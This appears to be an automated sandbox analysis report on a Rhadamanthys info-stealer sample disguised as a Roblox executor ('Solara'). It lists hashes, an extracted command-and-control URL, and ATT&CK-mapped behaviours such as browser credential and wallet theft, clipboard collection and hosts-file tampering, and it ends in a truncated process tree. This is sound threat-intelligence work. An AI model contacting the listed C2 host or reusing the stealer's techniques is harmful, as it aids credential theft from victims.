rhadamanthys | 97e1b9b1cd23d525be7dba8ba13b9ca7be56a4b33a9ee3b0b9bee3572973563c

Analysis

max time kernel
659s
max time network
660s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
02-09-2024 05:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

releases
Size

245KB
MD5

e23488271cbfb1482ed9c70eb22dba8b
SHA1

c21161bbf851d93e36e86fd862f8841fb8950b3c
SHA256

97e1b9b1cd23d525be7dba8ba13b9ca7be56a4b33a9ee3b0b9bee3572973563c
SHA512

2fc582ce8a910a843800d30620a6fcb42f644958332b3b0ccd0d8e74f5b224691cc1f2da69eb5109d82e95a9214d74dd570730d4b5350105962739094cca4fde
SSDEEP

6144:jboSQ3uokeOvHS1d1+CNs8wbiWQl9/vZJT3CqbMrhryf65NRPaCieMjAkvCJv1VU:voSQ3uokeOvHS1d1+CNs8wbiWQl9/vZx

Score

10^/10

rhadamanthys collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Extracted

Family

rhadamanthys

https://144.76.133.166:8034/5502b8a765a7d7349/k5851jfq.guti6

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1904 created 2852	1904	Solara.exe	49

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5288	powershell.exe
3880	powershell.exe
6056	powershell.exe
5260	powershell.exe
4952	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SolaraB.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5348	cmd.exe
1620	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
5660	SolaraB.exe
5768	SolaraB.exe
1468	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe
5768	SolaraB.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0002000000025d5c-1543.dat	upx
behavioral1/memory/5768-1547-0x00007FFA081A0000-0x00007FFA0860E000-memory.dmp	upx
behavioral1/files/0x0002000000025d5a-1553.dat	upx
behavioral1/memory/5768-1552-0x00007FFA187F0000-0x00007FFA18814000-memory.dmp	upx
behavioral1/memory/5768-1565-0x00007FFA26130000-0x00007FFA2613F000-memory.dmp	upx
behavioral1/files/0x0002000000025d51-1564.dat	upx
behavioral1/files/0x0002000000025d50-1563.dat	upx
behavioral1/files/0x0002000000025d4e-1562.dat	upx
behavioral1/files/0x0002000000025d61-1561.dat	upx
behavioral1/files/0x0002000000025d60-1560.dat	upx
behavioral1/files/0x0002000000025d5f-1559.dat	upx
behavioral1/memory/5768-1570-0x00007FFA18680000-0x00007FFA186AD000-memory.dmp	upx
behavioral1/memory/5768-1572-0x00007FFA1BC00000-0x00007FFA1BC1F000-memory.dmp	upx
behavioral1/memory/5768-1573-0x00007FFA087B0000-0x00007FFA08921000-memory.dmp	upx
behavioral1/memory/5768-1574-0x00007FFA187D0000-0x00007FFA187E9000-memory.dmp	upx
behavioral1/memory/5768-1571-0x00007FFA1C1D0000-0x00007FFA1C1E9000-memory.dmp	upx
behavioral1/memory/5768-1575-0x00007FFA260F0000-0x00007FFA260FD000-memory.dmp	upx
behavioral1/memory/5768-1576-0x00007FFA125B0000-0x00007FFA125DE000-memory.dmp	upx
behavioral1/memory/5768-1577-0x00007FFA081A0000-0x00007FFA0860E000-memory.dmp	upx
behavioral1/files/0x0002000000025d5b-1556.dat	upx
behavioral1/files/0x0002000000025d59-1555.dat	upx
behavioral1/files/0x0002000000025d4f-1549.dat	upx
behavioral1/memory/5768-1581-0x00007FFA07D60000-0x00007FFA080D5000-memory.dmp	upx
behavioral1/memory/5768-1580-0x00007FFA187F0000-0x00007FFA18814000-memory.dmp	upx
behavioral1/memory/5768-1578-0x00007FFA080E0000-0x00007FFA08198000-memory.dmp	upx
behavioral1/memory/5768-1582-0x00007FFA11440000-0x00007FFA11454000-memory.dmp	upx
behavioral1/memory/5768-1583-0x00007FFA24E70000-0x00007FFA24E7D000-memory.dmp	upx
behavioral1/memory/5768-1585-0x00007FFA07C40000-0x00007FFA07D58000-memory.dmp	upx
behavioral1/memory/5768-1584-0x00007FFA1BC00000-0x00007FFA1BC1F000-memory.dmp	upx
behavioral1/memory/5768-1618-0x00007FFA087B0000-0x00007FFA08921000-memory.dmp	upx
behavioral1/memory/5768-1619-0x00007FFA187D0000-0x00007FFA187E9000-memory.dmp	upx
behavioral1/memory/5768-1735-0x00007FFA080E0000-0x00007FFA08198000-memory.dmp	upx
behavioral1/memory/5768-1734-0x00007FFA125B0000-0x00007FFA125DE000-memory.dmp	upx
behavioral1/memory/5768-1775-0x00007FFA07D60000-0x00007FFA080D5000-memory.dmp	upx
behavioral1/memory/5768-1795-0x00007FFA081A0000-0x00007FFA0860E000-memory.dmp	upx
behavioral1/memory/5768-1810-0x00007FFA07C40000-0x00007FFA07D58000-memory.dmp	upx
behavioral1/memory/5768-1801-0x00007FFA087B0000-0x00007FFA08921000-memory.dmp	upx
behavioral1/memory/5768-1800-0x00007FFA1BC00000-0x00007FFA1BC1F000-memory.dmp	upx
behavioral1/memory/5768-1796-0x00007FFA187F0000-0x00007FFA18814000-memory.dmp	upx
behavioral1/memory/5768-1859-0x00007FFA081A0000-0x00007FFA0860E000-memory.dmp	upx
behavioral1/memory/5768-1883-0x00007FFA087B0000-0x00007FFA08921000-memory.dmp	upx
behavioral1/memory/5768-1884-0x00007FFA187D0000-0x00007FFA187E9000-memory.dmp	upx
behavioral1/memory/5768-1888-0x00007FFA07D60000-0x00007FFA080D5000-memory.dmp	upx
behavioral1/memory/5768-1894-0x00007FFA07C40000-0x00007FFA07D58000-memory.dmp	upx
behavioral1/memory/5768-1893-0x00007FFA24E70000-0x00007FFA24E7D000-memory.dmp	upx
behavioral1/memory/5768-1892-0x00007FFA11440000-0x00007FFA11454000-memory.dmp	upx
behavioral1/memory/5768-1887-0x00007FFA080E0000-0x00007FFA08198000-memory.dmp	upx
behavioral1/memory/5768-1886-0x00007FFA125B0000-0x00007FFA125DE000-memory.dmp	upx
behavioral1/memory/5768-1885-0x00007FFA260F0000-0x00007FFA260FD000-memory.dmp	upx
behavioral1/memory/5768-1877-0x00007FFA081A0000-0x00007FFA0860E000-memory.dmp	upx
behavioral1/memory/5768-1881-0x00007FFA1C1D0000-0x00007FFA1C1E9000-memory.dmp	upx
behavioral1/memory/5768-1880-0x00007FFA18680000-0x00007FFA186AD000-memory.dmp	upx
behavioral1/memory/5768-1879-0x00007FFA26130000-0x00007FFA2613F000-memory.dmp	upx
behavioral1/memory/5768-1878-0x00007FFA187F0000-0x00007FFA18814000-memory.dmp	upx
behavioral1/memory/5768-1882-0x00007FFA1BC00000-0x00007FFA1BC1F000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
78	raw.githubusercontent.com
81	raw.githubusercontent.com
119	discord.com
121	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
115	ip-api.com
119	ip-api.com
204	api.ipify.org
225	api.ipify.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2500	tasklist.exe
5088	tasklist.exe
6136	tasklist.exe
5264	tasklist.exe
1140	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5648	cmd.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4028 set thread context of 1904	4028	Solara.exe	132
PID 3376 set thread context of 4824	3376	Solara.exe	140

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\SolaraB.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2936	1904	WerFault.exe	132
3704	1904	WerFault.exe	132
1156	4824	WerFault.exe	140
3288	4824	WerFault.exe	140

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6076	PING.EXE
1584	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5244	cmd.exe
5556	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5556	WMIC.exe
3608	WMIC.exe
5476	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4128	systeminfo.exe

Kills process with taskkill 26 IoCs

evasion

pid	Process
3704	taskkill.exe
5844	taskkill.exe
2984	taskkill.exe
5184	taskkill.exe
5356	taskkill.exe
5112	taskkill.exe
4704	taskkill.exe
1216	taskkill.exe
4952	taskkill.exe
2332	taskkill.exe
4584	taskkill.exe
5432	taskkill.exe
4868	taskkill.exe
4844	taskkill.exe
5940	taskkill.exe
6116	taskkill.exe
4724	taskkill.exe
1432	taskkill.exe
5448	taskkill.exe
2496	taskkill.exe
5592	taskkill.exe
5464	taskkill.exe
4940	taskkill.exe
5188	taskkill.exe
5720	taskkill.exe
580	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133697269755503750"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4272559161-3282441186-401869126-1000\{D589F2A9-B425-4E6C-B687-858B0D45A89F}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4272559161-3282441186-401869126-1000\{D93DB41A-B62F-42F0-BCBC-06509119C4C3}	msedge.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 372198.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SolaraB.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ROBLOX EXECUTOR V2.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ROBLOX EXECUTOR.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Solara.zip:Zone.Identifier	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6076	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2608	chrome.exe
2608	chrome.exe
552	msedge.exe
552	msedge.exe
3568	msedge.exe
3568	msedge.exe
4484	identity_helper.exe
4484	identity_helper.exe
952	msedge.exe
952	msedge.exe
3052	msedge.exe
3052	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1680	msedge.exe
1680	msedge.exe
1904	Solara.exe
1904	Solara.exe
3396	openwith.exe
3396	openwith.exe
3396	openwith.exe
3396	openwith.exe
1620	msedge.exe
1620	msedge.exe
5288	powershell.exe
5288	powershell.exe
5260	powershell.exe
5260	powershell.exe
5288	powershell.exe
5260	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
1620	powershell.exe
1620	powershell.exe
5720	powershell.exe
5720	powershell.exe
1620	powershell.exe
5720	powershell.exe
3880	powershell.exe
3880	powershell.exe
3880	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
6056	powershell.exe
6056	powershell.exe
4628	powershell.exe
4628	powershell.exe
4856	msedge.exe
4856	msedge.exe
4248	msedge.exe
4248	msedge.exe
496	identity_helper.exe
496	identity_helper.exe
468	msedge.exe
468	msedge.exe
468	msedge.exe
2252	msedge.exe
2252	msedge.exe
1692	msedge.exe
1692	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5448	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 60 IoCs

pid	Process
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe
Token: SeShutdownPrivilege	2608	chrome.exe
Token: SeCreatePagefilePrivilege	2608	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
2608	chrome.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
3568	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5448	OpenWith.exe
5520	OpenWith.exe
5580	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2608 wrote to memory of 4252	2608	chrome.exe	87
PID 2608 wrote to memory of 4252	2608	chrome.exe	87
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 548	2608	chrome.exe	88
PID 2608 wrote to memory of 4852	2608	chrome.exe	89
PID 2608 wrote to memory of 4852	2608	chrome.exe	89
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90
PID 2608 wrote to memory of 2092	2608	chrome.exe	90

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1224	attrib.exe
2452	attrib.exe
2200	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2852
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3396

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\releases
1⤵
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
